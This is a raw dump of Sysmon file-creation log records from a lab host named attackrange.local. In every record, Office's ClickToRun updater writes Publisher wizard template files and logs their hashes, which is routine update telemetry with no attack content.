14:55:25.361{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\SAMPLES\SOLVSAMP.XLSMD5=8A54C32B5338611ECE0C12DF99D6BF8D,SHA256=A25A3D60E4D873D6323CAA9FB24D61D811C4A39AA664BD03E6A087175790B761,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069732Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.345{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\WSIDBR98.POCMD5=DEC73A77BC032FEC7DF468F0E512E3EA,SHA256=C8E69DCDF44015D24E6BE9AD88B3810D236E927E05D4D7708486D512F846BCF1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069731Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.345{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\WPULQT98.POCMD5=7027A8D18C6BAEBBC5CFDE79E2AD9F39,SHA256=0A9F86F61C6A58EBF8811FD4D2B58649E153B58318CFEC23E25F3C339AC70936,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069730Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.345{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\WORDREP.XMLMD5=EFA610B5933A322FCF6DEB8E8B1CC601,SHA256=CC37505CB80BF8C22B87FE22ED23689E54A70103A7C339945F656C94191D86B4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069729Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.345{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\WORDREP.DPVMD5=38CE01DC728C8AD8BCD948775E668EF8,SHA256=EBF350E3BA1D98FBC1B4D8E8253ED0C8FF22001EE9DA7AAB31365823DFE1B6B7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069728Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.329{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\WITHCOMP.XMLMD5=EC3C551AB673A15CDF6494ACB2E74096,SHA256=217226B48B560036202D79D3BA25FE6A8CC1D17B48496D4E4B6588DCE1FD4507,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069727Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.329{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\WITHCOMP.DPVMD5=A7A02C293B3E485D423C451BC067D261,SHA256=EAEE239FCD5AC42CB8C2751A01E150ECA688C6B17534CE9931A747928DE50261,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069726Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.329{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\WEBPAGE.XMLMD5=1CA75BCE3CC678BF65A9291FC63B01F7,SHA256=EC60A1DACA7ECC75232D96AE9FA8B4FD34EEA51C70A93A0DBE484BDA1FD5FA29,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069725Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.329{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\WEBPAGE.DPVMD5=1A378FC8CA972241EC041CB3AA8790F7,SHA256=124FC537F82D4072263BDF12ED53795BF7741E3B0AB484799E8F5D44A3EB0F50,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069724Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.314{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\WEBLINK.POCMD5=D10EF1E62EFC87AEDC9CC80035AB2104,SHA256=1548457C7ED33E4D8A9F3B195FBC1F0024DFF54A3AE6B5C01F143020EA0B0FE1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069723Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.314{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\WEBHOME.POCMD5=50701887465720708D3074BD9A9B4647,SHA256=D6121F7F9BAD6359DA820C8F6832EF338801DBC87D7138F79279EE69790E9C76,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069722Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.314{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\WEBHED98.POCMD5=1569FEF0F156DEE83051A47A07096CB0,SHA256=CD4337E8B9CED337B59A7D7DFC5CD9D59963BAC2536B28F6A0EE8B6CF66FFF19,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069721Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.314{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\WEBEMAIL.POCMD5=34196193788981FB9DCE5D90D70E4C63,SHA256=477953119BD894AF52E2D3591D367F7F3A23CB7A80BAD02F6747931A79E35F99,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069720Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.314{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\WEBCALSO.POCMD5=8DB65B3B4E1A6D8E33A1734CE28E8A0D,SHA256=74BFFEC39EB73BEE91C35A8BE9D63D63827EF897689A50DA96335DA95E2FAECA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069719Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.298{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\WEB11.POCMD5=66AA4022E2ED02A514F730A3F3893530,SHA256=73312280A9088B9B23B8A557251291E1366D9D4283C04B56B836964CA7CF4C93,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069718Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.251{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\WCOMP98.POCMD5=F6F0E51293A3899811B2A69E983E7928,SHA256=B4ED3D2117FF3942E0DB6089F146A76BEF7FF0B64FAEEA9DA77FB4188C083B08,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069717Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.251{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\TOC98.POCMD5=DA8EF320EB94DF855823C96FABFC4177,SHA256=6BC4BC3329740B32F5F165A3645A0F2475FBBEAAC860F5C5034D6896F0DDD2BB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069716Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.251{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\TEAROFF.POCMD5=FB451743BD6152F5058EFE16E6B86B2C,SHA256=599C8733174A44045A0B5568FB0C9CFD93E8BB6C0F3E0911F3FD5D959E367A30,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069715Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.251{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\STRBRST.POCMD5=915FBF1C2A0D10A8C61440F02F9FC379,SHA256=B0FB0DE891E7D714A9DF37497D8622177195E6B00AD5DAA9DF3959C84C418E19,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069714Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.251{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\STORYVERTBB.POCMD5=04A9CF532C55AD45A658EB2C83F2A81F,SHA256=457DAEEE92BB597747185F583E0A102C284C40E823A1954A12992282DEC4ED55,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069713Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.236{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\STORYVERTBB.DPVMD5=9368288DCEA5DFDDD3A67C0F4340C99B,SHA256=FD4AC2E111B5DB7199771FB5022688DE7ACF50EAB674ED69BBF778C467C27767,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069712Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.236{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\STORYBB.POCMD5=97C71020EE2ADC6F785155E68EF6631C,SHA256=216D861F8DC0F12294443D9C0ADF68D2A2AEDBB6C5DC366217BC801ECA883683,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069711Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.236{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\STORYBB.DPVMD5=987D9DADD614CD1FD79F8D9336260CC1,SHA256=EF44765950B4C4EEF99FF5B15BC71407F251FB4B174E9AD347605B0736F81105,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069710Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.220{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\SNIPE.POCMD5=749FE47E1CB73E74AE8BB90156E20020,SHA256=41577BF40AE6276BD1D31A3E5446600A7EDE86CDA07CADD2A94FAE0B415BA333,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069709Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.220{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\SIGNHM.POCMD5=A5BC049AEB56A07FDA9B494276A8A4CA,SHA256=E9CDC04CE94F2C33240971551E818ED19AFF8FEE3F95AEA41625C58C23AF27D7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069708Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.220{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\SIGN98.POCMD5=2F03986F937ACA11FF0832B969B6307B,SHA256=56A61FBCCF153B20673B5246E9C62016EC955082CFB77E53D6D7B94E75DF067D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069707Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.220{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\SIGN.XMLMD5=DA8876150B7E7E515A8906313426FAEC,SHA256=4AFEC5B1CC1259607FF40FA9E08267D3AEFA86B488B1A16854ED7459A3B37866,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069706Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.220{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\SIGN.DPVMD5=62C9B0C9D4151B7102C8EFA57261CA9F,SHA256=21603B55E648D95271D85782793614D9AE726F764002A21C62832211BD9E5A9B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069705Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.220{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\SIDEBARVERTBB.POCMD5=FFB7E53D98B5DE231BD2B0C6F8F4F7A4,SHA256=312770521A4774FE64BFA3E0B809296F7F807E66B7D65E6A873804481F294618,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069704Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.220{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\SIDEBARVERTBB.DPVMD5=F0646C0FCD2279888B3AE787620688A6,SHA256=76C512B675AA861A627B29F2F12B4646922585ACCF13D03A451219A003753388,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069703Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.204{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\SIDEBARBB.POCMD5=BB6BED6664CD59F173F5D0A2E423A423,SHA256=141DD79B667A705E645EC365CBA6E326228131380C637A4659970C8CE562798E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069702Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.204{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\SIDEBARBB.DPVMD5=D4685C65C945834C9BD1BE7B1977E7D3,SHA256=C16F8C4CE4196D8995139B79E6FE6DDBD2043D716C16C9073AA638159BD945FF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069701Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.204{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\SIDBAR98.POCMD5=A96773FC59D7C94FEE836E66C903D641,SHA256=2517ABB935D0A91506F34ED70EABC8B218DE50953E49FA0E02C8FF7E493B80A0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069700Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.204{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\RSPMECH.POCMD5=1F0F2DAF7711D95190FB54F1553AB79B,SHA256=1733A38E77A73A337AACEE6F43E08AFE8CB305A411DF0362A9CB1F365BDFFCDA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069699Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.189{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\RESUME.XMLMD5=D4B5E85185C4C0823E707DCB1D51F99F,SHA256=27A12ED84C12EEF3B3E524F58B91CDD226F1AB84F719B495FE00961A8CC2CC40,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069698Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.189{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\RESUME.DPVMD5=5B204A195E96B2EAD77092FB8850948B,SHA256=EE3C302492A9C60D985AFE4D53959CC10F7DA6338B936FB2AECE5F01FE85426E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069697Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.189{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\RESP98.POCMD5=351B3571CF1F9C74B37E2AE0DD5A9B5E,SHA256=8E777815D6BE3704D20AFD75ABEA505BCE3374E5BF88EE186A19B804F2F00EBB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069696Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.189{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\RES98.POCMD5=9CBD7058B8CF1C9D0D90C4EA9A471200,SHA256=CA818A201BF1C862F39280253546A893C8E012EE99A78426C97D51A7517FB8CC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069695Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.189{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\REPTWIZ.POCMD5=DDFCC7E770D5E7209EC8E53DB3B361A8,SHA256=00AC19326B128E090D96D5C36D9B60F22AE772A64560552AEE3BA1ADBC2DAFFB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069694Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.189{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\QUIKPUBS.POCMD5=E58AAF799E456CA12DC25A83D41FD212,SHA256=F0D33F88169D42D0ED2D1E63756BD45E737DC2A193A1B1EA4EFA45405F4F53F6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069693Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.173{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\QP.XMLMD5=FD28DDA8B42A218EEF1915828A4CBB6C,SHA256=805944BE5197A47B6465DBAFAC49FEBDE2D0804499F52B9BE1022AA0495C7554,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069692Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.173{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\QP.DPVMD5=073A6157BF2C332AEF6FFD9E01C5E11A,SHA256=B76648C072F32587FAD2053F3725A2CC392D240CB3291910896A91AB731390FB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069691Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.158{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\PULQOT98.POCMD5=5714E2AFEDD6C476AA33EE3268F8EEE8,SHA256=120C0BD7CA6D7CECC6279E5680EF03143F7A9DA0FE7D3D9584003E67B7E6F16A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069690Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.158{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\PULLQUOTEBB.POCMD5=4579CABF0A8133C282878F8FB3F6B8EF,SHA256=A9986A2BF1A771F1E4A9FEF95FE31BC1CE136E6CEA28DD042E3BF6A0D6106FC0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069689Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.158{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\PULLQUOTEBB.DPVMD5=3EE7AE66025663723CC8A144D4391948,SHA256=64FEEA0348941BABCDBD638FAF9859B52B2BDA2F37CA8E4157663B5D606EFE6E,IMPHASH=00000000000000000000000000000000falsetrue 